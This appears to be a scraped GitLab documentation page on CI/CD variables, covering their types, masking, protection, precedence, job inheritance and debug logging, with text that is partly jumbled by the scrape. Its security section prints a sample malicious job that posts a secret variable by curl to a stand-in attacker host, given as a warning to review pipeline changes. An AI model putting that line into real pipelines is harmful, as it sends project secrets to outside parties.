- Predefined CI/CD variables
-
Custom CI/CD variables
- Create a custom CI/CD variable in the
.gitlab-ci.yml
file - Use variables in other variables
- Add a CI/CD variable to a project
- Add a CI/CD variable to a group
- Add a CI/CD variable to an instance
- CI/CD variable types
- Mask a CI/CD variable
- Protect a CI/CD variable
- CI/CD variable security
- Custom variables validated by GitLab
- Create a custom CI/CD variable in the
- Use CI/CD variables in job scripts
- Pass an environment variable to another job
- CI/CD variable precedence
- Override a defined CI/CD variable
- Limit the environment scope of a CI/CD variable
- Deployment variables
- Auto DevOps environment variables
- Debug logging
- Video walkthrough of a working example
GitLab CI/CD variables
CI/CD variables are a type of environment variable. You can use them to:
- Control the behavior of jobs and pipelines.
- Store values you want to re-use.
- Avoid hard-coding values in your
.gitlab-ci.yml
file.
You can use predefined CI/CD variables or define custom:
-
Variables in the
.gitlab-ci.yml
file. - Project CI/CD variables.
- Group CI/CD variables.
- Instance CI/CD variables.
.gitlab-ci.yml
:variables:
SA_PASSWORD: $SA_PASSWORD
For more information about advanced use of GitLab CI/CD:
Predefined CI/CD variables
GitLab CI/CD has a default set of predefined CI/CD variables you can use in pipelines configuration and job scripts.
Use predefined CI/CD variables
You can use predefined CI/CD variables in your .gitlab-ci.yml
without declaring them first.
This example shows how to output a job’s stage by using the CI_JOB_STAGE
predefined variable:
test_variable:
stage: test
script:
- echo "$CI_JOB_STAGE"
The script outputs the stage
for the test_variable
, which is test
:
Custom CI/CD variables
You can create custom CI/CD variables:
- For a project:
- For all projects in a group in the group’s setting.
- For all projects in a GitLab instance in the instance’s settings.
You can override variable values manually for a specific pipeline, or have them prefilled in manual pipelines.
There are two types of variables: File
or Variable
.
Variable names are limited by the shell the runner uses to execute scripts. Each shell has its own set of reserved variable names.
Make sure each variable is defined for the scope you want to use it in.
By default, pipelines from forked projects can’t access CI/CD variables in the parent project. If you run a merge request pipeline in the parent project for a merge request from a fork, all variables become available to the pipeline.
Create a custom CI/CD variable in the .gitlab-ci.yml
file
To create a custom variable in the .gitlab-ci.yml
file,
define the variable and value with variables
keyword.
You can use the variables
keyword in a job or at the top level of the .gitlab-ci.yml
file.
If the variable is at the top level, it’s globally available and all jobs can use it.
If it’s defined in a job, only that job can use it.
variables:
TEST_VAR: "All jobs can use this variable's value"
job1:
variables:
TEST_VAR_JOB: "Only job1 can use this variable's value"
script:
- echo "$TEST_VAR" and "$TEST_VAR_JOB"
Variables saved in the .gitlab-ci.yml
file should store only non-sensitive project
configuration, like a RAILS_ENV
or DATABASE_URL
variable. These variables are
visible in the repository. Store sensitive variables containing secrets, keys, and so on
in project settings.
Variables saved in the .gitlab-ci.yml
file are also available in service containers.
If you don’t want globally defined variables to be available in a job, set variables
to {}
:
job1:
variables: {}
script:
- echo This job does not need any variables
Use the value
and description
keywords to define variables that are prefilled
for manually-triggered pipelines.
Use variables in other variables
You can use variables inside other variables:
job:
variables:
FLAGS: '-al'
LS_CMD: 'ls "$FLAGS"'
script:
- 'eval "$LS_CMD"' # Executes 'ls -al'
Use the $
character in variables
If you do not want the $
character interpreted as the start of a variable, use $$
instead:
job:
variables:
FLAGS: '-al'
LS_CMD: 'ls "$FLAGS" $$TMP_DIR'
script:
- 'eval "$LS_CMD"' # Executes 'ls -al $TMP_DIR'
Add a CI/CD variable to a project
You can add CI/CD variables to a project’s settings. Only project members with the
Maintainer role
can add or update project CI/CD variables. To keep a CI/CD variable secret, put it
in the project settings, not in the .gitlab-ci.yml
file.
To add or update variables in the project settings:
- Go to your project’s Settings > CI/CD and expand the Variables section.
-
Select the Add Variable button and fill in the details:
-
Key: Must be one line, with no spaces, using only letters, numbers, or
_
. - Value: No limitations.
-
Type:
File
orVariable
. -
Environment scope: Optional.
All
, or specific environments. - Protect variable Optional. If selected, the variable is only available in pipelines that run on protected branches or tags.
- Mask variable Optional. If selected, the variable’s Value is masked in job logs. The variable fails to save if the value does not meet the masking requirements.
-
Key: Must be one line, with no spaces, using only letters, numbers, or
After you create a variable, you can use it in the .gitlab-ci.yml
file:
test_variable:
stage: test
script:
- echo "$CI_JOB_STAGE" # calls a predefined variable
- echo "$TEST" # calls a custom variable of type `env_var`
- echo "$GREETING" # calls a custom variable of type `file` that contains the path to the temp file
- cat "$GREETING" # the temp file itself contains the variable value
The output is:
Add a CI/CD variable to a group
Support for environment scopes
To make a CI/CD variable available to all projects in a group, define a group CI/CD variable.
Use group variables to store secrets like passwords, SSH keys, and credentials, if you:
To add a group variable:
Select the Add Variable button and fill in the details:
To view all the group-level variables available in a project:
Variables from subgroups are recursively
inherited.
To make a CI/CD variable available to all projects and groups in a GitLab instance,
add an instance CI/CD variable. You must have administrator access.
You can define instance variables via the UI or API.
To add an instance variable:
Select the Add variable button, and fill in the details:
All predefined CI/CD variables and variables defined in the Use Some tools like
and kubectl
use For example, if you have the following variables:
Use the variables in a job script like this:
An alternative to It is not possible to create a CI/CD variable that is an array of values, but you
can use shell scripting techniques for similar behavior.
For example, you can store multiple variables separated by a space in a variable,
then loop through the values with a script:
You can mask a project, group, or instance CI/CD variable so the value of the variable
does not display in job logs.
To mask a variable:
The method used to mask variables limits what can be included in a masked variable.
The value of the variable must:
You can protect a project, group or instance CI/CD variable so it is only passed
to pipelines running on protected branches
or protected tags.
Merge request pipelines do not have access to protected variables.
An To protect a variable:
The variable is available for all subsequent pipelines.
Malicious code pushed to your Review all merge requests that introduce changes to the The following example shows malicious code in a Variable values are encrypted using aes-256-cbc
and stored in the database. This data can only be read and decrypted with a
valid secrets file.
Some variables are listed in the UI so you can choose them more quickly.
All CI/CD variables are set as environment variables in the job’s environment.
You can use variables in job scripts with the standard formatting for each environment’s
shell.
To access environment variables, use the syntax for your runner executor’s shell.
To access environment variables in Bash, To access variables in a Windows PowerShell environment, including environment
variables set by the system, prefix the variable name with ( In
environment variables must be surrounded by quotes to expand properly:
To access CI/CD variables in Windows Batch, surround the variable
with You can also surround the variable with You can list all environment variables available to a script with the For example:
Example job log output:
You can pass environment variables from one job to another job in a later stage
through variable inheritance.
These variables cannot be used as CI/CD variables to configure a pipeline, but
they can be used in job scripts.
Inherited variables take precedence over
certain types of new variable definitions such as job defined variables.
The To have no inherited dotenv environment variables, pass an empty Multi-project pipelines
can also inherit variables from their upstream pipelines.
You can use CI/CD variables with the same name in different places, but the values
can overwrite each other. The type of variable and where they are defined determines
which variables take precedence.
The order of precedence for variables is (from highest to lowest):
In the following example, when the script in You can override the value of a variable when you:
The pipeline variables declared in these events take priority over other variables.
You can override the value of a CI/CD variable when you
run a pipeline manually.
You can grant permission to override variables to maintainers only. When other users try to run a pipeline
with overridden variables, they receive the If you store your CI/CD configurations in a different repository,
use this setting for control over the environment the pipeline runs in.
You can enable this feature by using the projects API
to enable the By default, all CI/CD variables are available to any job in a pipeline. Therefore, if a project uses a
compromised tool in a test job, it could expose all CI/CD variables that a deployment job used. This is
a common scenario in supply chain attacks. GitLab helps mitigate supply chain attacks by limiting
the environment scope of a variable. GitLab does this by
defining which environments and corresponding jobs
the variable can be available for.
To learn more about scoping environments, see Scoping environments with specs.
To learn more about ensuring CI/CD variables are only exposed in pipelines running from protected
branches or tags, see Protect a CI/CD Variable.
Integrations that are responsible for deployment configuration can define their own
variables that are set in the build environment. These variables are only defined
for deployment jobs.
For example, the Kubernetes integration
defines deployment variables that you can use with the integration.
The documentation for each integration
explains if the integration has any deployment variables available.
You can configure Auto DevOps to pass CI/CD variables
to a running application.
To make a CI/CD variable available as an environment variable in the running application’s container,
prefix the variable key
with CI/CD variables with multi-line values are not supported.
Introduced in GitLab Runner 1.7.
You can use debug logging to help troubleshoot problems with pipeline configuration
or job scripts. Debug logging exposes job execution details that are usually hidden
by the runner and makes job logs more verbose. It also exposes all variables and secrets
available to the job.
Before you enable debug logging, make sure only team members
can view job logs. You should also delete job logs
with debug output before you make logs public again.
To enable debug logging (tracing), set the Example output (truncated):
You can restrict access to debug logging. When restricted, only users with
at least the Developer role
can view job logs when debug logging is enabled with a variable in:
The Managing the Complex Configuration Data Management Monster Using GitLab
video is a walkthrough of the
working example project. It explains how multiple levels of group CI/CD variables
can be combined with environment-scoped project variables for complex configuration
of application builds or deployments.
The example can be copied to your own group or instance for testing. More details
on what other GitLab CI patterns are demonstrated are available at the project page.
If you didn't find what you were looking for,
search the docs.
If you want help with something specific and could use community support,
.
For problems setting up or using this feature (depending on your GitLab
subscription).
_
.
File
or Variable
.
All
, or specific environments.
View all group-level variables available in a project
Add a CI/CD variable to an instance
_
.
File
or Variable
.
CI/CD variable types
.gitlab-ci.yml
file
are Variable
type. Project, group and instance CI/CD variables can be Variable
or File
type.
Variable
type variables:
File
type CI/CD variables for tools that need a file as input.
File
type variables:
File
type variables for configuration.
Variable
: KUBE_URL
with the value https://example.com
.
File
: KUBE_CA_PEM
with a certificate as the value.
kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$KUBE_CA_PEM"
File
type variables is to:
variable
type).
# Read certificate stored in $KUBE_CA_PEM variable and save it in a new file
cat "$KUBE_CA_PEM" > "$(pwd)/kube.ca.pem"
# Pass the newly created file to kubectl
kubectl config set-cluster e2e --server="$KUBE_URL" --certificate-authority="$(pwd)/kube.ca.pem"
Store multiple values in one variable
job1:
variables:
FOLDERS: src test docs
script:
- |
for FOLDER in $FOLDERS
do
echo "The path is root/${FOLDER}"
done
Mask a CI/CD variable
@
and :
characters (In ).
.
character (In ).
~
character (In ).
Protect a CI/CD variable
CI/CD variable security
.gitlab-ci.yml
file could compromise your variables
and send them to a third party server regardless of the masked setting. If the pipeline
runs on a protected branch or
protected tag, malicious code can compromise protected variables.
.gitlab-ci.yml
file before you:
.gitlab-ci.yml
file:
build:
script:
- curl --request POST --data "secret_variable=$SECRET_VARIABLE" "https://maliciouswebsite.abcd/"
Custom variables validated by GitLab
Variable
Allowed Values
Introduced in
AWS_ACCESS_KEY_ID
Any
12.10
AWS_DEFAULT_REGION
Any
12.10
AWS_SECRET_ACCESS_KEY
Any
12.10
Use CI/CD variables in job scripts
Use variables with Bash,
sh
and similar
sh
, and similar shells, prefix the
CI/CD variable with ($
):
job_name:
script:
- echo "$CI_JOB_ID"
Use variables with PowerShell
$env:
) or ($
):
job_name:
script:
- echo $env:CI_JOB_ID
- echo $CI_JOB_ID
- echo $env:PATH
job_name:
script:
- D:\\qislsf\\apache-ant-1.10.5\\bin\\ant.bat "-DsosposDailyUsr=$env:SOSPOS_DAILY_USR" portal_test
Use variables with Windows Batch
%
:
job_name:
script:
- echo %CI_JOB_ID%
!
for .
Delayed expansion might be needed for variables that contain white spaces or newlines.
job_name:
script:
- echo !ERROR_MESSAGE!
List all environment variables
export
command
in Bash or dir env:
in PowerShell. This exposes the values of all available
variables, which can be a security risk.
Masked variables display as [masked]
.
job_name:
script:
- export
# - 'dir env:' # Use this for PowerShell
export CI_JOB_ID="50"
export CI_COMMIT_SHA="1ecfd275763eff1d6b4844ea3168962458c9f27a"
export CI_COMMIT_SHORT_SHA="1ecfd275"
export CI_COMMIT_REF_NAME="main"
export CI_REPOSITORY_URL="https://gitlab-ci-token:[masked]@example.com/gitlab-org/gitlab-foss.git"
export CI_COMMIT_TAG="1.0.0"
export CI_JOB_NAME="spec:other"
export CI_JOB_STAGE="test"
export CI_JOB_MANUAL="true"
export CI_JOB_TRIGGERED="true"
export CI_JOB_TOKEN="[masked]"
export CI_PIPELINE_ID="1000"
export CI_PIPELINE_IID="10"
export CI_PAGES_DOMAIN="gitlab.io"
export CI_PAGES_URL="https://gitlab-org.gitlab.io/gitlab-foss"
export CI_PROJECT_ID="34"
export CI_PROJECT_DIR="/builds/gitlab-org/gitlab-foss"
export CI_PROJECT_NAME="gitlab-foss"
export CI_PROJECT_TITLE="GitLab FOSS"
export CI_PROJECT_NAMESPACE="gitlab-org"
export CI_PROJECT_ROOT_NAMESPACE="gitlab-org"
export CI_PROJECT_PATH="gitlab-org/gitlab-foss"
export CI_PROJECT_URL="https://example.com/gitlab-org/gitlab-foss"
export CI_REGISTRY="registry.example.com"
export CI_REGISTRY_IMAGE="registry.example.com/gitlab-org/gitlab-foss"
export CI_REGISTRY_USER="gitlab-ci-token"
export CI_REGISTRY_PASSWORD="[masked]"
export CI_RUNNER_ID="10"
export CI_RUNNER_DESCRIPTION="my runner"
export CI_RUNNER_TAGS="docker, linux"
export CI_SERVER="yes"
export CI_SERVER_URL="https://example.com"
export CI_SERVER_HOST="example.com"
export CI_SERVER_PORT="443"
export CI_SERVER_PROTOCOL="https"
export CI_SERVER_NAME="GitLab"
export CI_SERVER_REVISION="70606bf"
export CI_SERVER_VERSION="8.9.0"
export CI_SERVER_VERSION_MAJOR="8"
export CI_SERVER_VERSION_MINOR="9"
export CI_SERVER_VERSION_PATCH="0"
export GITLAB_USER_EMAIL="user@example.com"
export GITLAB_USER_ID="42"
...
Pass an environment variable to another job
.env
file.
VARIABLE_NAME=ANY VALUE HERE
.
.env
file as an artifacts:reports:dotenv
artifact.
build:
stage: build
script:
- echo "BUILD_VARIABLE=value_from_build_job" >> build.env
artifacts:
reports:
dotenv: build.env
deploy:
stage: deploy
variables:
BUILD_VARIABLE: value_from_deploy_job
script:
- echo "$BUILD_VARIABLE" # Output is: 'value_from_build_job' due to precedence
dependencies
or
needs
keywords can be used to control
which jobs receive inherited values.
dependencies
or
needs
list, or pass needs:artifacts
as false
build:
stage: build
script:
- echo "BUILD_VERSION=hello" >> build.env
artifacts:
reports:
dotenv: build.env
deploy_one:
stage: deploy
script:
- echo "$BUILD_VERSION" # Output is: 'hello'
dependencies:
- build
deploy_two:
stage: deploy
script:
- echo "$BUILD_VERSION" # Output is empty
dependencies: []
deploy_three:
stage: deploy
script:
- echo "$BUILD_VERSION" # Output is: 'hello'
needs:
- build
deploy_four:
stage: deploy
script:
- echo "$BUILD_VERSION" # Output is: 'hello'
needs:
job: build
artifacts: true
deploy_five:
stage: deploy
script:
- echo "$BUILD_VERSION" # Output is empty
needs:
job: build
artifacts: false
CI/CD variable precedence
.gitlab-ci.yml
file.
.gitlab-ci.yml
file.
job1
executes, the value of API_TOKEN
is secure
.
Variables defined in jobs have a higher precedence than variables defined globally.
variables:
API_TOKEN: "default"
job1:
variables:
API_TOKEN: "secure"
script:
- echo "The variable value is $API_TOKEN"
Override a defined CI/CD variable
variable
keyword
or by using variable inheritance.
Override a variable when running a pipeline manually
Restrict who can override variables
Insufficient permissions to set pipeline variables
error message.
restrict_user_defined_variables
setting. The setting is disabled
by default.
Limit the environment scope of a CI/CD variable
Deployment variables
Auto DevOps environment variables
K8S_SECRET_
.
Debug logging
Enable Debug logging
CI_DEBUG_TRACE
variable to true
:
job_name:
variables:
CI_DEBUG_TRACE: "true"
...
export CI_SERVER_TLS_CA_FILE="/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE"
if [[ -d "/builds/gitlab-examples/ci-debug-trace/.git" ]]; then
echo $'\''\x1b[32;1mFetching changes...\x1b[0;m'\''
$'\''cd'\'' "/builds/gitlab-examples/ci-debug-trace"
$'\''git'\'' "config" "fetch.recurseSubmodules" "false"
$'\''rm'\'' "-f" ".git/index.lock"
$'\''git'\'' "clean" "-ffdx"
$'\''git'\'' "reset" "--hard"
$'\''git'\'' "remote" "set-url" "origin" "https://gitlab-ci-token:xxxxxxxxxxxxxxxxxxxx@example.com/gitlab-examples/ci-debug-trace.git"
$'\''git'\'' "fetch" "origin" "--prune" "+refs/heads/*:refs/remotes/origin/*" "+refs/tags/*:refs/tags/lds"
++ CI_BUILDS_DIR=/builds
++ export CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace
++ CI_PROJECT_DIR=/builds/gitlab-examples/ci-debug-trace
++ export CI_CONCURRENT_ID=87
++ CI_CONCURRENT_ID=87
++ export CI_CONCURRENT_PROJECT_ID=0
++ CI_CONCURRENT_PROJECT_ID=0
++ export CI_SERVER=yes
++ CI_SERVER=yes
++ mkdir -p /builds/gitlab-examples/ci-debug-trace.tmp
++ echo -n '-----BEGIN CERTIFICATE-----
-----END CERTIFICATE-----'
++ export CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE
++ CI_SERVER_TLS_CA_FILE=/builds/gitlab-examples/ci-debug-trace.tmp/CI_SERVER_TLS_CA_FILE
++ export CI_PIPELINE_ID=52666
++ CI_PIPELINE_ID=52666
++ export CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666
++ CI_PIPELINE_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/pipelines/52666
++ export CI_JOB_ID=7046507
++ CI_JOB_ID=7046507
++ export CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655
++ CI_JOB_URL=https://gitlab.com/gitlab-examples/ci-debug-trace/-/jobs/379424655
++ export CI_JOB_TOKEN=[MASKED]
++ CI_JOB_TOKEN=[MASKED]
++ export CI_REGISTRY_USER=gitlab-ci-token
++ CI_REGISTRY_USER=gitlab-ci-token
++ export CI_REGISTRY_PASSWORD=[MASKED]
++ CI_REGISTRY_PASSWORD=[MASKED]
++ export CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git
++ CI_REPOSITORY_URL=https://gitlab-ci-token:[MASKED]@gitlab.com/gitlab-examples/ci-debug-trace.git
++ export CI_JOB_NAME=debug_trace
++ CI_JOB_NAME=debug_trace
++ export CI_JOB_STAGE=test
++ CI_JOB_STAGE=test
++ export CI_NODE_TOTAL=1
++ CI_NODE_TOTAL=1
++ export CI=true
++ CI=true
++ export GITLAB_CI=true
++ GITLAB_CI=true
++ export CI_SERVER_URL=https://gitlab.com:3000
++ CI_SERVER_URL=https://gitlab.com:3000
++ export CI_SERVER_HOST=gitlab.com
++ CI_SERVER_HOST=gitlab.com
++ export CI_SERVER_PORT=3000
++ CI_SERVER_PORT=3000
++ export CI_SERVER_PROTOCOL=https
++ CI_SERVER_PROTOCOL=https
++ export CI_SERVER_NAME=GitLab
++ CI_SERVER_NAME=GitLab
++ export GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,visual_review_app,wip_limits,adjourned_deletion_for_projects_and_groups,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_project_service_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,pseudonymizer,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal
++ GITLAB_FEATURES=audit_events,burndown_charts,code_owners,contribution_analytics,description_diffs,elastic_search,group_bulk_edit,group_burndown_charts,group_webhooks,issuable_default_templates,issue_weights,jenkins_integration,ldap_group_sync,member_lock,merge_request_approvers,multiple_issue_assignees,multiple_ldap_servers,multiple_merge_request_assignees,protected_refs_for_users,push_rules,related_issues,repository_mirrors,repository_size_limit,scoped_issue_board,usage_quotas,visual_review_app,wip_limits,adjourned_deletion_for_projects_and_groups,admin_audit_log,auditor_user,batch_comments,blocking_merge_requests,board_assignee_lists,board_milestone_lists,ci_cd_projects,cluster_deployments,code_analytics,code_owner_approval_required,commit_committer_check,cross_project_pipelines,custom_file_templates,custom_file_templates_for_namespace,custom_project_templates,custom_prometheus_metrics,cycle_analytics_for_groups,db_load_balancing,default_project_deletion_protection,dependency_proxy,deploy_board,design_management,email_additional_text,extended_audit_events,external_authorization_service_api_management,feature_flags,file_locks,geo,github_project_service_integration,group_allowed_email_domains,group_project_templates,group_saml,issues_analytics,jira_dev_panel_integration,ldap_group_sync_filter,merge_pipelines,merge_request_performance_metrics,merge_trains,metrics_reports,multiple_approval_rules,multiple_group_issue_boards,object_storage,operations_dashboard,packages,productivity_analytics,project_aliases,protected_environments,reject_unsigned_commits,required_ci_templates,scoped_labels,service_desk,smartcard_auth,group_timelogs,type_of_work_analytics,unprotection_restrictions,ci_project_subscriptions,cluster_health,container_scanning,dast,dependency_scanning,epics,group_ip_restriction,incident_management,insights,license_management,personal_access_token_expiration_policy,pod_logs,prometheus_alerts,pseudonymizer,report_approver_rules,sast,security_dashboard,tracing,web_ide_terminal
++ export CI_PROJECT_ID=17893
++ CI_PROJECT_ID=17893
++ export CI_PROJECT_NAME=ci-debug-trace
++ CI_PROJECT_NAME=ci-debug-trace
++ export CI_PROJECT_TITLE='GitLab FOSS'
++ CI_PROJECT_TITLE='GitLab FOSS'
++ export CI_PROJECT_PATH=gitlab-examples/ci-debug-trace
++ CI_PROJECT_PATH=gitlab-examples/ci-debug-trace
++ export CI_PROJECT_PATH_SLUG=gitlab-examples-ci-debug-trace
++ CI_PROJECT_PATH_SLUG=gitlab-examples-ci-debug-trace
++ export CI_PROJECT_NAMESPACE=gitlab-examples
++ CI_PROJECT_NAMESPACE=gitlab-examples
++ export CI_PROJECT_ROOT_NAMESPACE=gitlab-examples
++ CI_PROJECT_ROOT_NAMESPACE=gitlab-examples
++ export CI_PROJECT_URL=https://gitlab.com/gitlab-examples/ci-debug-trace
++ CI_PROJECT_URL=https://gitlab.com/gitlab-examples/ci-debug-trace
++ export CI_PROJECT_VISIBILITY=public
++ CI_PROJECT_VISIBILITY=public
++ export CI_PROJECT_REPOSITORY_LANGUAGES=
++ CI_PROJECT_REPOSITORY_LANGUAGES=
++ export CI_PROJECT_CLASSIFICATION_LABEL=
++ CI_PROJECT_CLASSIFICATION_LABEL=
++ export CI_DEFAULT_BRANCH=main
++ CI_DEFAULT_BRANCH=main
++ export CI_REGISTRY=registry.gitlab.com
++ CI_REGISTRY=registry.gitlab.com
++ export CI_API_V4_URL=https://gitlab.com/api/v4
++ CI_API_V4_URL=https://gitlab.com/api/v4
++ export CI_PIPELINE_IID=123
++ CI_PIPELINE_IID=123
++ export CI_PIPELINE_SOURCE=web
++ CI_PIPELINE_SOURCE=web
++ export CI_CONFIG_PATH=.gitlab-ci.yml
++ CI_CONFIG_PATH=.gitlab-ci.yml
++ export CI_COMMIT_SHA=dd648b2e48ce6518303b0bb580b2ee32fadaf045
++ CI_COMMIT_SHA=dd648b2e48ce6518303b0bb580b2ee32fadaf045
++ export CI_COMMIT_SHORT_SHA=dd648b2e
++ CI_COMMIT_SHORT_SHA=dd648b2e
++ export CI_COMMIT_BEFORE_SHA=0000000000000000000000000000000000000000
++ CI_COMMIT_BEFORE_SHA=0000000000000000000000000000000000000000
++ export CI_COMMIT_REF_NAME=main
++ CI_COMMIT_REF_NAME=main
++ export CI_COMMIT_REF_SLUG=main
++ CI_COMMIT_REF_SLUG=main
...
Restrict access to debug logging
.gitlab-ci.yml
file.
CI_DEBUG_TRACE
as a local variable to runners, debug logs generate and are visible
to all users with access to job logs. The permission levels are not checked by the runner,
so you should only use the variable in GitLab itself.Video walkthrough of a working example
Help & feedback
Docs
Edit this page
to fix an error or add an improvement in a merge request.
Create an issue
to suggest an improvement to this page.
Product
Create an issue
if there's something you don't like about this feature.
Propose functionality
by submitting a feature request.
to help shape new features.
Feature availability and product trials
to see all GitLab tiers and features, or to upgrade.
with access to all features for 30 days.
Get Help